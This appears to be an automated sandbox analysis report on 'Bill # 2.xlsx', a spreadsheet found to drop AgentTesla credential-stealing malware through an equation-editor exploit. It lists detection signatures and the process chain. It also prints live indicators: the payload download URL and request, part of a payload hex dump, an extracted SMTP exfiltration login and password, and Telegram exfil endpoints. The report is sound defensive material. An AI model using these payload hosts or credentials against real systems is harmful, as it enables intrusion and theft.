Loading ...

Play interactive tourEdit tour

Analysis Report Bill # 2.xlsx

Overview

General Information

Sample Name:Bill # 2.xlsx
Analysis ID:321163
MD5:483b35b49726fc59ba720ca3106a69f6
SHA1:58b66c28ec98e732920179eb4e270e7b00517f08
SHA256:982e68644911b369c8d440f2ca7e0380b5bb7b3400fe2f53d13f34f2fce5505b
Tags:xlsx

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
May check the online IP address of the machine
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2016 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2492 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2708 cmdline: 'C:\Users\Public\vbc.exe' MD5: C11D6124EE0522C7AB71D20CF3474DC0)
      • RegAsm.exe (PID: 2452 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
      • RegAsm.exe (PID: 2344 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
      • RegAsm.exe (PID: 2364 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "DAjOFWZ9dn", "URL: ": "https://AkXBTiOq5oAkuzK9T5L.org", "To: ": "", "ByHost: ": "us2.smtp.mailhostbox.com:587", "Password: ": "NEASmo3yRPX2q", "From: ": ""}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2360877305.00000000029FF000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000004.00000002.2167918680.000000000071B000.00000004.00000020.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000007.00000002.2360916542.0000000002A3A000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.RegAsm.exe.400000.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              4.2.vbc.exe.460000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2708
                Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.23.212.152, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2492, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
                Sigma detected: File Dropped By EQNEDT32EXEShow sources
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2492, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\tochi[1].exe
                Sigma detected: Executables Started in Suspicious FolderShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2708
                Sigma detected: Execution in Non-Executable FolderShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2708
                Sigma detected: Suspicious Program Location Process StartsShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2708

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus detection for URL or domainShow sources
                Source: http://198.23.212.152/doc/tochi.exeAvira URL Cloud: Label: malware
                Found malware configurationShow sources
                Source: RegAsm.exe.2364.7.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "DAjOFWZ9dn", "URL: ": "https://AkXBTiOq5oAkuzK9T5L.org", "To: ": "", "ByHost: ": "us2.smtp.mailhostbox.com:587", "Password: ": "NEASmo3yRPX2q", "From: ": ""}
                Multi AV Scanner detection for submitted fileShow sources
                Source: Bill # 2.xlsxVirustotal: Detection: 31%Perma Link
                Machine Learning detection for dropped fileShow sources
                Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\tochi[1].exeJoe Sandbox ML: detected

                Exploits:

                barindex
                Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                Source: global trafficDNS query: name: api.ipify.org
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 23.21.42.25:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.23.212.152:80

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 1560 WEB-MISC /doc/ access 192.168.2.22:49167 -> 198.23.212.152:80
                Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 198.23.212.152:80
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49170 -> 208.91.198.143:587
                May check the online IP address of the machineShow sources
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Nov 2020 12:47:40 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34Last-Modified: Fri, 20 Nov 2020 07:43:07 GMTETag: "97200-5b484fece2d5f"Accept-Ranges: bytesContent-Length: 619008Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 81 71 b7 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 6a 09 00 00 06 00 00 00 00 00 00 ce 89 09 00 00 20 00 00 00 a0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 02 00 00 09 f1 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 89 09 00 4f 00 00 00 00 a0 09 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 69 09 00 00 20 00 00 00 6a 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 a0 09 00 00 04 00 00 00 6c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 09 00 00 02 00 00 00 70 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 89 09 00 00 00 00 00 48 00 00 00 02 00 05 00 78 e9 08 00 04 a0 00 00 03 00 00 00 10 00 00 06 f0 71 00 00 88 77 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 62 00 64 00 63 00 65 00 66 00 67 00 68 00 69 00 6a 00 6b 00 6c 00 6d 00 6e 00 70 00 72 00 71 00 73 00 74 00 75 00 76 00 77 00 7a 00 79 00 78 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 41 00 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 51 00 50 00 52 00 54 00 53 00 56 00 55 00 57 00 58 00 59 00 5a 00 36 02 03 28 03 00 00 06 6f 01 00 00 0a 2a 42 03 02 03 28 01 00 00 06 14 6f 02 00 00 0a 26 2a 32 02 28 05 00 00 06 74 06 00 00 01 2a 1e 28 06 00 00 06 26 2a 32 02 74 07 00 00 01 6f 03 00 00 0a 2a 46 7e 02 00 00 04 7e 03 00 00 04 28 02 00 00 06 17 2a 0a 16 2a 1e 02 28 07 00 00 0a 2a ba 28 08 00 00 0a 80 01 00 00 04 28 0d 00 00 06 28 09 00 00 0a 80 02 00 00 04 28 0d 00 00 06 28 09 00 00 0a 6f 0a 00 00 0a 80 03 00 00 04 2a 26 02 03 04 6f 0b 00 00 0a 2a 1a 28 04 00 00 06 2a 1a 28 0e 00 00 06 2a 2e 72 29 00 00 70 80 04 00 00 0
                Source: Joe Sandbox ViewIP Address: 23.21.42.25 23.21.42.25
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                Source: global trafficHTTP traffic detected: GET /doc/tochi.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.212.152Connection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6B13A00.emfJump to behavior
                Source: global trafficHTTP traffic detected: GET /doc/tochi.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.212.152Connection: Keep-Alive
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: unknownDNS traffic detected: queries for: api.ipify.org
                Source: RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                Source: RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpString found in binary or memory: http://VaMNef.com
                Source: RegAsm.exe, 00000007.00000002.2360843456.00000000029DD000.00000004.00000001.sdmpString found in binary or memory: http://api.ipify.org
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: RegAsm.exe, 00000007.00000002.2359903836.000000000091C000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: RegAsm.exe, 00000007.00000002.2362318559.00000000057B0000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: RegAsm.exe, 00000007.00000002.2360843456.00000000029DD000.00000004.00000001.sdmpString found in binary or memory: http://elb097307-934924932.us-east-1.elb.amazonaws.com
                Source: vbc.exe, 00000004.00000003.2167387608.0000000004C74000.00000004.00000001.sdmpString found in binary or memory: http://ns.a
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: RegAsm.exe, 00000007.00000002.2360145060.0000000002430000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: RegAsm.exe, 00000007.00000002.2360822194.00000000029CA000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RegAsm.exe, 00000007.00000002.2362741103.00000000067C0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                Source: RegAsm.exe, 00000007.00000002.2360976971.0000000002A96000.00000004.00000001.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                Source: RegAsm.exe, 00000007.00000002.2360145060.0000000002430000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: RegAsm.exe, 00000007.00000002.2360916542.0000000002A3A000.00000004.00000001.sdmpString found in binary or memory: https://AkXBTiOq5oAkuzK9T5L.org
                Source: RegAsm.exe, 00000007.00000002.2360808155.00000000029BA000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org
                Source: RegAsm.exe, 00000007.00000002.2360808155.00000000029BA000.00000004.00000001.sdmp, RegAsm.exe, 00000007.00000002.2360822194.00000000029CA000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org/
                Source: RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.orgGETMozilla/5.0
                Source: RegAsm.exe, 00000007.00000002.2360835164.00000000029D8000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.orgP
                Source: vbc.exe, 00000004.00000002.2167918680.000000000071B000.00000004.00000020.sdmp, RegAsm.exe, 00000007.00000002.2359672684.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/
                Source: RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: vbc.exe, 00000004.00000002.2167918680.000000000071B000.00000004.00000020.sdmp, RegAsm.exe, 00000007.00000002.2359672684.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                Source: RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443

                System Summary:

                barindex
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Screenshot number: 4Screenshot OCR: Enable Editing" from protected documents the yellow bar above 27 28 29 30 31 32 33 34 35
                Source: Screenshot number: 4Screenshot OCR: protected documents the yellow bar above 27 28 29 30 31 32 33 34 35 36 37 13 14 15 "
                Office equation editor drops PE fileShow sources
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\tochi[1].exeJump to dropped file
                Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\Public\vbc.exeCode function: 4_2_003F00AD NtOpenSection,NtMapViewOfSection,
                Source: C:\Users\Public\vbc.exeCode function: 4_2_003F1C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtTerminateProcess,NtUnmapViewOfSection,NtWriteVirtualMemory,NtSetContextThread,NtResumeThread,
                Source: C:\Users\Public\vbc.exeCode function: 4_2_0109F5C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0023F850
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00235328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00236348
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0023ECA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0023D608
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00235670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00232091
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0023C9B7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_005294A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_005285D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00521600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00522310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_005257C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0052AFC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0052F0D0
